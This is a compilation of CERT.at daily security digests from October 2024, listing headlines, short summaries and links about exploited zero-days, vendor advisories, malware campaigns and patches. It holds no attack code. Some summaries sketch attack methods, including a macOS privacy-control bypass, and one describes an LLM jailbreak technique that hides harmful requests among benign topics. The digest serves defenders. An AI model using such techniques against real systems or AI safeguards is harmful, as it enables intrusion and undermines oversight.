∗∗∗ Critical zero-day vulnerability in FortiManager is actively exploited - update available ∗∗∗
---------------------------------------------
A critical vulnerability has been discovered in FortiManager that is already being actively exploited by attackers. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code or commands. CVE-2024-47575, CVSS Base Score: 9.8
---------------------------------------------
https://www.cert.at/de/warnungen/2024/10/kritische-zero-day-schwachstelle-i…
∗∗∗ Cisco reports more than 35 vulnerabilities in firewall products ∗∗∗
---------------------------------------------
Cisco's ASA, Firepower and Secure Firewall Management Center have vulnerabilities, some of them critical. Now-available updates close more than 35 of them. [..] Three of the advisories cover vulnerabilities rated as critical risk, eleven cover high-risk ones, 21 cover vulnerabilities rated as medium severity, and one further advisory is informational without a risk rating.
---------------------------------------------
https://heise.de/-9992639
∗∗∗ Drupal Security Advisories 2024-10-23 ∗∗∗
---------------------------------------------
Drupal released 5 security advisories. (1 Critical, 3 Moderately Critical, 1 Less Critical)
---------------------------------------------
https://www.drupal.org/security
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (grafana, NetworkManager-libreswan, python3.11, and python39:3.9 and python39-devel:3.9), Fedora (dotnet6.0, koji, python-fastapi, python-openapi-core, python-platformio, python-starlette, rust-pyo3, rust-pyo3-build-config, rust-pyo3-ffi, rust-pyo3-macros, rust-pyo3-macros-backend, and yarnpkg), Oracle (grafana, kernel, linux-firmware, NetworkManager-libreswan, and python3.11), Slackware (php81), and SUSE (apache2, buildah, cups-filters, go1.21-openssl, podman, postgresql16, python-pyOpenSSL, and webkit2gtk3).
---------------------------------------------
https://lwn.net/Articles/995550/
∗∗∗ VU#123336: Vulnerable WiFi Alliance example code found in Arcadyan FMIMG51AX000J ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/123336
∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (October 14, 2024 to October 20, 2024) ∗∗∗
---------------------------------------------
https://www.wordfence.com/blog/2024/10/wordfence-intelligence-weekly-wordpr…
∗∗∗ Unauthenticated path traversal vulnerability in Lawo AG vsm LTC Time Sync (vTimeSync) ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/unauthenticated-path-…
∗∗∗ iniNet Solutions SpiderControl SCADA PC HMI Editor ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02
∗∗∗ VIMESA VHF/FM Transmitter Blue Plus ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-01
∗∗∗ Deep Sea Electronics DSE855 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-03
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 22-10-2024 18:00 − Mittwoch 23-10-2024 18:00
Handler: Thomas Pribitzer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Exploit released for new Windows Server "WinReg" NTLM Relay attack ∗∗∗
---------------------------------------------
Proof-of-concept exploit code is now public for a vulnerability in Microsoft's Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/exploit-released-for-new-win…
∗∗∗ Hackers exploit 52 zero-days on the first day of Pwn2Own Ireland ∗∗∗
---------------------------------------------
On the first day of Pwn2Own Ireland, participants demonstrated 52 zero-day vulnerabilities across a range of devices, earning a total of $486,250 in cash prizes.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-exploit-52-zero-days…
∗∗∗ Fortinet warns of new critical FortiManager flaw used in zero-day attacks ∗∗∗
---------------------------------------------
Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critic…
∗∗∗ Android and iOS: hard-coded cloud credentials discovered in popular apps ∗∗∗
---------------------------------------------
Several apps with, in some cases, millions of downloads are affected. According to the discoverers, this endangers not only backend services but also user data.
---------------------------------------------
https://www.golem.de/news/android-und-ios-fest-codierte-cloud-zugangsdaten-…
∗∗∗ Grandoreiro, the global trojan with grandiose ambitions ∗∗∗
---------------------------------------------
In this report, Kaspersky experts analyze recent Grandoreiro campaigns, new targets, tricks, and banking trojan versions.
---------------------------------------------
https://securelist.com/grandoreiro-banking-trojan/114257/
∗∗∗ The Crypto Game of Lazarus APT: Investors vs. Zero-days ∗∗∗
---------------------------------------------
Kaspersky GReAT experts break down the new campaign of Lazarus APT, which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
---------------------------------------------
https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/
∗∗∗ CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) ∗∗∗
---------------------------------------------
A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active ..
---------------------------------------------
https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html
∗∗∗ Beware of fake shop: sparhimmel24.de ∗∗∗
---------------------------------------------
sparhimmel24.de is a fraudulent online shop that lures you into a trap with supposed bargains. Orders are not delivered despite payment. We show you how to recognize fake shops and protect yourself from fraud.
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-fake-shop-sparhimmel24de
∗∗∗ Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction ∗∗∗
---------------------------------------------
We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate.
---------------------------------------------
https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distr…
∗∗∗ Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs ∗∗∗
---------------------------------------------
Did you know there’s widespread exploitation of FortiNet products going on using a zero day, and that there’s no CVE? Now you do.
---------------------------------------------
https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerabi…
∗∗∗ Threat Spotlight: WarmCookie/BadSpace ∗∗∗
---------------------------------------------
WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns.
---------------------------------------------
https://blog.talosintelligence.com/warmcookie-analysis/
∗∗∗ Vulnerability in Samsung Android driver is under attack ∗∗∗
---------------------------------------------
Drivers for Samsung's mobile processors allow attackers to escalate their privileges. Google warns of ongoing attacks on them.
---------------------------------------------
https://heise.de/-9991521
∗∗∗ Public Report: WhatsApp Contacts Security Assessment ∗∗∗
---------------------------------------------
In May 2024, Meta engaged NCC Group’s Cryptography Services practice to perform a cryptography security assessment of selected aspects of the WhatsApp Identity Proof Linked Storage (IPLS) protocol implementation. IPLS underpins the WhatsApp Contacts solution, which aims to store ..
---------------------------------------------
https://www.nccgroup.com/us/research-blog/public-report-whatsapp-contacts-s…
=====================
= Vulnerabilities =
=====================
∗∗∗ SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices ∗∗∗
---------------------------------------------
InterMesh Subscriber devices contain multiple vulnerabilities that could allow an unauthenticated remote attacker to execute arbitrary code with root privileges. CVSS v4.0 Base Score: 10.0, CVE-2024-47901
---------------------------------------------
https://cert-portal.siemens.com/productcert/html/ssa-333468.html?ste_sid=23…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (dmitry, libheif, and python-sql), Fedora (suricata and wireshark), SUSE (cargo-c, libeverest, protobuf, and qemu), and Ubuntu (golang-1.22, libheif, unbound, and webkit2gtk).
---------------------------------------------
https://lwn.net/Articles/995293/
∗∗∗ 2024-10-21: Cyber Security Advisory - ABB Relion 611, 615, 620, 630 series, REX610, REX640, SMU615, SSC600, Arctic solution, COM600, SPA ZC-400, SUE3000 Guidelines to Prevent Unauthorized Modifications of Firmware and Configuration ∗∗∗
---------------------------------------------
https://search.abb.com/library/Download.aspx?DocumentID=2NGA001911&Language…
∗∗∗ Authenticated Remote Code Execution in multiple Xerox printers ∗∗∗
---------------------------------------------
https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-cod…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 21-10-2024 18:00 − Dienstag 22-10-2024 18:00
Handler: Thomas Pribitzer
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ FortiManager: update apparently seals an attacked security hole ∗∗∗
---------------------------------------------
Without any public information, Fortinet has released updates for FortiManager. They apparently close vulnerabilities that are under attack.
---------------------------------------------
https://heise.de/-9990393
∗∗∗ An .rdp file can be dangerous too ∗∗∗
---------------------------------------------
Today a spear-phishing campaign was observed across all of Europe in which the recipient is meant to open an attached RDP file.
---------------------------------------------
https://www.cert.at/de/aktuelles/2024/10/auch-rdp-file-kann-gefahrlich-sein
∗∗∗ Security Flaw in Styra's OPA Exposes NTLM Hashes to Remote Attackers ∗∗∗
---------------------------------------------
Details have emerged about a now-patched security flaw in Styra's Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes.
---------------------------------------------
https://thehackernews.com/2024/10/security-flaw-in-styras-opa-exposes.html
∗∗∗ Pixel perfect Ghostpulse malware loader hides inside PNG image files ∗∗∗
---------------------------------------------
The Ghostpulse malware strain now retrieves its main payload via a PNG image file's pixels. This development, security experts say, is "one of the most significant changes" made by the crooks behind it since launching in 2023.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/22/ghostpulse_m…
∗∗∗ OpenSSL 3.4.0 released ∗∗∗
---------------------------------------------
Version 3.4.0 of the OpenSSL SSL/TLS library has been released. It adds a number of new encryption algorithms, support for "directly fetched composite signature algorithms such as RSA-SHA2-256", and more. See the release notes for details.
---------------------------------------------
https://lwn.net/Articles/995098/
∗∗∗ Akira ransomware continues to evolve ∗∗∗
---------------------------------------------
As the Akira ransomware group continues to evolve its operations, Talos has the latest research on the group's attack chain, targeted verticals, and potential future TTPs.
---------------------------------------------
https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/
∗∗∗ Threat actor abuses Gophish to deliver new PowerRAT and DCRAT ∗∗∗
---------------------------------------------
Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor. [..] Talos discovered an undocumented PowerShell RAT we’re calling PowerRAT, as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT.
---------------------------------------------
https://blog.talosintelligence.com/gophish-powerrat-dcrat/
∗∗∗ Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach ∗∗∗
---------------------------------------------
In this blog entry, we discuss how malicious actors are exploiting Docker remote API servers via gRPC/h2c to deploy the cryptominer SRBMiner to facilitate their mining of XRP on Docker hosts.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-crypto…
∗∗∗ Web Application Security for DevOps: Site and Origin Dynamics and Cross-Site Request Forgery ∗∗∗
---------------------------------------------
This is a continuation of the series on web application security where we dive into cookie dynamics.
---------------------------------------------
https://www.bitsight.com/blog/web-application-security-devops-site-and-orig…
=====================
= Vulnerabilities =
=====================
∗∗∗ VMware fixes bad patch for critical vCenter Server RCE flaw ∗∗∗
---------------------------------------------
VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-c…
∗∗∗ Zyxel security advisory for insufficiently protected credentials vulnerability in firewalls ∗∗∗
---------------------------------------------
The insufficiently protected credentials vulnerability in the CLI command of the USG FLEX H series firewalls could allow an authenticated local attacker to gain privilege escalation by stealing the authentication token of a logged-in administrator. Note that this attack could be successful only if the administrator has not logged out.
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (ffmpeg, ghostscript, libsepol, openjdk-11, openjdk-17, perl, and python-sql), Oracle (389-ds-base, buildah, containernetworking-plugins, edk2, httpd, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel, python-setuptools, skopeo, and webkit2gtk3), Red Hat (buildah), Slackware (openssl), SUSE (apache2, firefox, libopenssl-3-devel, podman, and python310-starlette), and Ubuntu (cups-browsed, firefox, libgsf, and linux-gke).
---------------------------------------------
https://lwn.net/Articles/995095/
∗∗∗ Dell Product Security Update Advisory (CVE-2024-45766) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/83995/
∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-45711) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/84002/
∗∗∗ ICONICS and Mitsubishi Electric Products ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-296-01
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 18-10-2024 18:00 − Montag 21-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ New macOS vulnerability, “HM Surf”, could lead to unauthorized data access ∗∗∗
---------------------------------------------
Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent. [..] Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerab…
∗∗∗ Hooked by the Call: A Deep Dive into The Tricks Used in Callback Phishing Emails ∗∗∗
---------------------------------------------
Previously, Trustwave SpiderLabs covered a massive fake order spam scheme that impersonated a tech support company and propagated via Google Groups. Since then, we have observed more spam campaigns using this hybrid form of cyberattack with varying tactics, techniques, and procedures (TTP). [..] In this blog, we will showcase the different spam techniques used in these phishing emails.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hooked-by-t…
∗∗∗ Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials ∗∗∗
---------------------------------------------
Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. [..] The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim's web browser.
---------------------------------------------
https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html
∗∗∗ Severe flaws in E2EE cloud storage platforms used by millions ∗∗∗
---------------------------------------------
Several end-to-end encrypted (E2EE) cloud storage platforms are vulnerable to a set of security issues that could expose user data to malicious actors. [..] The researchers notified Sync, pCloud, Seafile, and Icedrive of their findings on April 23, 2024, and contacted Tresorit on September 27, 2024, to discuss potential improvements in their particular cryptographic designs. [..] BleepingComputer contacted all five cloud service providers for a comment on Hofmann's and Truong's research, and we received the below statements.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/severe-flaws-in-e2ee-cloud-s…
∗∗∗ Open source LLM tool primed to sniff out Python zero-days ∗∗∗
---------------------------------------------
The static analyzer uses Claude AI to identify vulns and suggest exploit code. Researchers with Seattle-based Protect AI plan to release a free, open source tool that can find zero-day vulnerabilities in Python codebases with the help of Anthropic's Claude AI model.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/10/20/python_zero_…
∗∗∗ Hunting for Remote Management Tools: Detecting RMMs ∗∗∗
---------------------------------------------
Given the wide range of different RMM tools available, performing a threat hunt to identify all different available tools used in the organization brings a couple of challenges. In this blog, we’ll dive a little deeper into how we tackled this challenge and share this knowledge so you can use it to keep your organization safe.
---------------------------------------------
https://blog.nviso.eu/2024/10/21/hunting-for-remote-management-tools-detect…
∗∗∗ Cisco confirms attack on DevHub portal and takes it offline ∗∗∗
---------------------------------------------
Cisco has advanced its ongoing investigation into an IT security incident and has now confirmed an attack. Attackers are said to have had access to data that was not intended for the public.
---------------------------------------------
https://heise.de/-9987412
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (asterisk, chromium, php-horde-mime-viewer, and php-horde-turba), Fedora (apache-commons-io, buildah, chromium, containers-common, libarchive, libdigidocpp, oath-toolkit, podman, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, rust-tower0.4, thunderbird, and unbound), SUSE (buildah, chromedriver, chromium, element-desktop, element-web, jetty-annotations, nodejs-electron, php7, php74, php8, podman, python3-virtualbox, qemu, thunderbird, and valkey), and Ubuntu (amd64-microcode).
---------------------------------------------
https://lwn.net/Articles/994941/
∗∗∗ Attackers can target PCs running Bitdefender and Trend Micro antivirus ∗∗∗
---------------------------------------------
Security vulnerabilities in antivirus software from Bitdefender and Trend Micro put systems at risk. Admins should install the available security updates promptly to prevent attacks. [..] In the support area of the Bitdefender website, the developers state that they have closed a total of five vulnerabilities (CVE-2023-49567, CVE-2023-49570, CVE-2023-6055, CVE-2023-6056, CVE-2023-6057) rated "high" in this context. For such an attack to succeed, attackers can, for example, use hash collisions (MD5 and SHA1) to create certificates that are waved through as legitimate. The security issues are said to be resolved in Total Security version 27.0.25.11, which installs automatically.
---------------------------------------------
https://heise.de/-9987394
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 17-10-2024 18:00 − Freitag 18-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia ∗∗∗
---------------------------------------------
A close look at the utilities, techniques, and infrastructure used by the hacktivist group Crypt Ghouls has revealed links to groups such as Twelve, BlackJack, etc.
---------------------------------------------
https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/1142…
∗∗∗ Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) ∗∗∗
---------------------------------------------
In the perpetually evolving field of cybersecurity, new threats materialize daily. Attackers are on the prowl for weaknesses in infrastructure and software like a cat eyeing its helpless prey.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/feline-hack…
∗∗∗ U.S. and Allies Warn of Iranian Cyberattacks on Critical Infrastructure in Year-Long Campaign ∗∗∗
---------------------------------------------
Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks. "Since October 2023, Iranian ..
---------------------------------------------
https://thehackernews.com/2024/10/us-and-allies-warn-of-iranian.html
∗∗∗ Intel hits back at China's accusations it bakes in NSA backdoors ∗∗∗
---------------------------------------------
Chipzilla says it obeys the law wherever it is, which is nice. Intel has responded to Chinese claims that its chips include security backdoors at the direction of America's NSA.
---------------------------------------------
https://www.theregister.com/2024/10/18/intel_china_security_allegations/
∗∗∗ Alleged Bitcoin crook faces 5 years after SEC's X account pwned ∗∗∗
---------------------------------------------
SIM swappers strike again, warping cryptocurrency prices. An Alabama man faces five years in prison for allegedly attempting to manipulate the price of Bitcoin by pwning the US Securities and Exchange Commission's X account earlier this year.
---------------------------------------------
https://www.theregister.com/2024/10/18/sec_bitcoin_arrest/
∗∗∗ Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach ∗∗∗
---------------------------------------------
Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI's InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led ..
---------------------------------------------
https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infr…
∗∗∗ EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs ∗∗∗
---------------------------------------------
One of my Mastodon followers sent me an interesting toot today, which led to this forum post ..
---------------------------------------------
https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targe…
∗∗∗ What I’ve learned in my first 7-ish years in cybersecurity ∗∗∗
---------------------------------------------
Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor.
---------------------------------------------
https://blog.talosintelligence.com/threat-source-newsletter-oct-17-2024/
∗∗∗ Call stack spoofing explained using APT41 malware ∗∗∗
---------------------------------------------
Call stack spoofing isn't a new technique, but it has become more popular in the last few years. Call stacks are a telemetry source for EDR software that can be used to determine if a process made suspicious actions (requesting a handle to the lsass process, writing suspicious code to a newly allocated area, ..
---------------------------------------------
https://cybergeeks.tech/call-stack-spoofing-explained-using-apt41-malware/
∗∗∗ Fake North Korean IT Workers Infiltrate Western Firms, Demand Ransom ∗∗∗
---------------------------------------------
North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom.
---------------------------------------------
https://hackread.com/fake-north-korean-it-workers-west-firms-demand-ransom/
∗∗∗ U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now ∗∗∗
---------------------------------------------
Joint U.S. and UK advisory identifies 24 vulnerabilities exploited by Russian state-sponsored APT 29, with GreyNoise detecting active probing on nine of these critical CVEs. Stay informed with real-time ..
---------------------------------------------
https://www.greynoise.io/blog/u-s-and-uk-warn-of-russian-cyber-threats-9-of…
∗∗∗ Apple Passwords: this is the recipe for generated passwords ∗∗∗
---------------------------------------------
A senior Apple software engineer explains in a blog post the pattern Apple uses to generate passwords.
---------------------------------------------
https://heise.de/-9986503
=====================
= Vulnerabilities =
=====================
∗∗∗ SVD-2024-1013: Third-Party Package Updates in Splunk Add-on for Office 365 - October 2024 ∗∗∗
---------------------------------------------
Splunk remedied common vulnerabilities and exposures (CVEs) in Third Party Packages in Splunk Add-on for Office 365 versions 4.5.2 and higher.
---------------------------------------------
https://advisory.splunk.com//advisories/SVD-2024-1013
∗∗∗ Synology-SA-24:17 Synology Camera ∗∗∗
---------------------------------------------
The vulnerabilities allow remote attackers to execute arbitrary code, remote attackers to bypass security constraints and remote attackers to conduct denial-of-service attacks via a susceptible version of Synology Camera BC500 Firmware, Synology Camera TC500 Firmware and Synology Camera CC400W Firmware.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_24_17
∗∗∗ ZDI-24-1419: Trend Micro Deep Security Improper Access Control Local Privilege Escalation Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1419/